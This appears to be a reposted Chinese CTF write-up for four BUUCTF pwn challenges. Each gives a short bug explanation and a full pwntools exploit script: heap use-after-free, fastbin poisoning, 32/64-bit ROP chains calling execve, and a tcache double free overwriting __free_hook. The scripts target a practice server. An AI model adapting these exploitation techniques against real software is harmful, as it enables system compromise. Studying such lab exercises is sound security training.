欢迎访问 生活随笔!
TAG聚合

生活随笔

当前位置: 首页 >

PWN-PRACTICE-BUUCTF-29

发布时间:2023/12/10 44 豆豆
生活随笔 收集整理的这篇文章主要介绍了 PWN-PRACTICE-BUUCTF-29 小编觉得挺不错的,现在分享给大家,帮大家做个参考.

PWN-PRACTICE-BUUCTF-29

    • actf_2019_babyheap
    • wustctf2020_easyfast
    • 强网杯2019 拟态 STKOF
    • hitcon_2018_children_tcache

actf_2019_babyheap

UAF,创建两个非0x10大小的chunk,比如两个0x20
程序会创建四个chunk,大小依次为0x10,0x20,0x10,0x20
按序free掉创建的chunk,两个0x10大小的chunk形成一条链,两个0x20大小的chunk形成一条链
再创建一个0x10大小的chunk,会用到两个在fastbin中0x10大小的chunk
新创建的chunk内容为"/bin/sh"的地址和system的实际地址
最后show(0)即可system("/bin/sh")

# -*- coding:utf-8 -*- from pwn import * #context.log_level="debug" #io=process("./ACTF_2019_babyheap") io=remote("node4.buuoj.cn",27740) elf=ELF("./ACTF_2019_babyheap") libc=ELF("./libc-2.27-18-x64.so")def add(size,content):io.sendlineafter("Your choice: ","1")io.sendlineafter("Please input size: \n",str(size))io.sendafter("Please input content: \n",content) def free(index):io.sendlineafter("Your choice: ","2")io.sendlineafter("Please input list index: \n",str(index)) def show(index):io.sendlineafter("Your choice: ","3")io.sendlineafter("Please input list index: \n",str(index))system_plt=elf.plt["system"] binsh=0x602010add(0x20,"aaaa")#0 add(0x20,"bbbb")#1free(0) free(1)add(0x10,p64(binsh)+p64(system_plt))#2 show(0)io.interactive()

wustctf2020_easyfast

UAF,根据0x602090地址处的值来决定是否执行system("/bin/sh")
想办法在0x602090-0x10=0x602080处创建一个chunk,然后修改0x602090处的值为0
可以看到0x602088处有一个值0x50,实际上是当作fake chunk的size域
利用UAF,改写chunk的fd域,使之指向0x602080处,再创建fake chunk改写0x602090的值

# -*- coding:utf-8 -*- from pwn import * #context.log_level="debug" #io=process("./wustctf2020_easyfast") io=remote("node4.buuoj.cn",28112) elf=ELF("./wustctf2020_easyfast") libc=ELF("./libc-2.23-16-x64.so")def add(size):io.sendlineafter("choice>\n","1")io.sendlineafter("size>\n",str(size)) def free(index):io.sendlineafter("choice>\n","2")io.sendlineafter("index>\n",str(index)) def edit(index,content):io.sendlineafter("choice>\n","3")io.sendlineafter("index>\n",str(index))io.sendline(content) def shell():io.sendlineafter("choice>\n","4")shell_flag=0x602090add(0x40)#0 add(0x40)#1 free(0) edit(0,p64(shell_flag-0x10)) add(0x40)#2 add(0x40)#3 edit(3,p64(0)) shell() io.interactive()

强网杯2019 拟态 STKOF

栈溢出,但是加了拟态防御,参考:拟态防御题型pwn&web初探

# -*- coding:utf-8 -*- from pwn import * from struct import packdef payload32():p = ''p += pack('<I', 0x0806e9cb) # pop edx ; retp += pack('<I', 0x080d9060) # @ .datap += pack('<I', 0x080a8af6) # pop eax ; retp += '/bin'p += pack('<I', 0x08056a85) # mov dword ptr [edx], eax ; retp += pack('<I', 0x0806e9cb) # pop edx ; retp += pack('<I', 0x080d9064) # @ .data + 4p += pack('<I', 0x080a8af6) # pop eax ; retp += '//sh'p += pack('<I', 0x08056a85) # mov dword ptr [edx], eax ; retp += pack('<I', 0x0806e9cb) # pop edx ; retp += pack('<I', 0x080d9068) # @ .data + 8p += pack('<I', 0x08056040) # xor eax, eax ; retp += pack('<I', 0x08056a85) # mov dword ptr [edx], eax ; retp += pack('<I', 0x080481c9) # pop ebx ; retp += pack('<I', 0x080d9060) # @ .datap += pack('<I', 0x0806e9f2) # pop ecx ; pop ebx ; retp += pack('<I', 0x080d9068) # @ .data + 8p += pack('<I', 0x080d9060) # padding without overwrite ebxp += pack('<I', 0x0806e9cb) # pop edx ; retp += pack('<I', 0x080d9068) # @ .data + 8p += pack('<I', 0x08056040) # xor eax, eax ; retp += pack('<I', 0x080a8af6) # pop eax ; retp += p32(0xb)p += pack('<I', 0x080495a3) # int 0x80return pdef payload64():p = ''p += pack('<Q', 0x0000000000405895) # pop rsi ; retp += pack('<Q', 0x00000000006a10e0) # @ .datap += pack('<Q', 0x000000000043b97c) # pop rax ; retp += '/bin//sh'p += pack('<Q', 0x000000000046aea1) # mov qword ptr [rsi], rax ; retp += pack('<Q', 0x0000000000405895) # pop rsi ; retp += pack('<Q', 0x00000000006a10e8) # @ .data + 8p += pack('<Q', 0x0000000000436ed0) # xor rax, rax ; retp += pack('<Q', 0x000000000046aea1) # mov qword ptr [rsi], rax ; retp += pack('<Q', 0x00000000004005f6) # pop rdi ; retp += pack('<Q', 0x00000000006a10e0) # @ .datap += pack('<Q', 0x0000000000405895) # pop rsi ; retp += pack('<Q', 0x00000000006a10e8) # @ .data + 8p += pack('<Q', 0x000000000043b9d5) # pop rdx ; retp += pack('<Q', 0x00000000006a10e8) # @ .data + 8p += pack('<Q', 0x0000000000436ed0) # xor rax, rax ; retp += pack('<Q', 0x000000000043b97c) # pop rax ; retp += p64(0x3b)p += pack('<Q', 0x00000000004011dc) # syscallreturn pio=remote("node4.buuoj.cn",25016) add_esp=0x080a8f69 # add esp, 0xc ; ret add_rsp=0x00000000004079d5 # add esp, 0xd8 ; ret payload="a"*0x10C+"\x00"*4+p64(add_esp)+p64(add_rsp) payload+=payload32().ljust(0xd8,"\x00") payload+=payload64() io.sendline(payload) io.interactive()

hitcon_2018_children_tcache

obo + tcache,参考:HITCON_2018_children_tcache

# -*- coding:utf-8 -*- from pwn import * #io=process("./HITCON_2018_children_tcache") io=remote("node4.buuoj.cn",25946) elf=ELF("./HITCON_2018_children_tcache") libc=ELF("./libc-2.27-18-x64.so")def add(size,content):io.sendlineafter("Your choice: ","1")io.sendlineafter("Size:",str(size))io.sendlineafter("Data:",content) def show(index):io.sendlineafter("Your choice: ","2")io.sendlineafter("Index:",str(index)) def free(index):io.sendlineafter("Your choice: ","3")io.sendlineafter("Index:",str(index))#gdb.attach(io) #pause()add(0x410,"aaaa")#0 add(0xe8,"bbbb")#1 add(0x4f0,"cccc")#2 add(0x60,"dddd")#3#pause()free(0)#pause()free(1)#pause()for i in range(6):add(0xe8-i,"b"*(0xe8-i))free(0)#pause()add(0xe8,"b"*0xe0+p64(0x510))#0#pause()free(2) #合并chunk#pause()add(0x410,"aaaa")#1#pause()show(0) offset=0x3ebca0 leak_addr=u64(io.recvuntil("\x7f")[-6:].ljust(8,"\x00")) print("leak_addr=="+hex(leak_addr)) libc_base=leak_addr-offset print("libc_base=="+hex(libc_base)) free_hook=libc_base+libc.sym["__free_hook"] ones=[0x4f2c5,0x4f322,0x10a38c] one_gadget=libc_base+ones[1]#pause()add(0x60,"dddd")#2#pause()free(0)#pause()free(2) #double free#pause()add(0x60,p64(free_hook)) add(0x60,p64(free_hook)) add(0x60,p64(one_gadget))#pause()free(0)io.interactive()

总结

以上是生活随笔为你收集整理的PWN-PRACTICE-BUUCTF-29的全部内容,希望文章能够帮你解决所遇到的问题。

如果觉得生活随笔网站内容还不错,欢迎将生活随笔推荐给好友。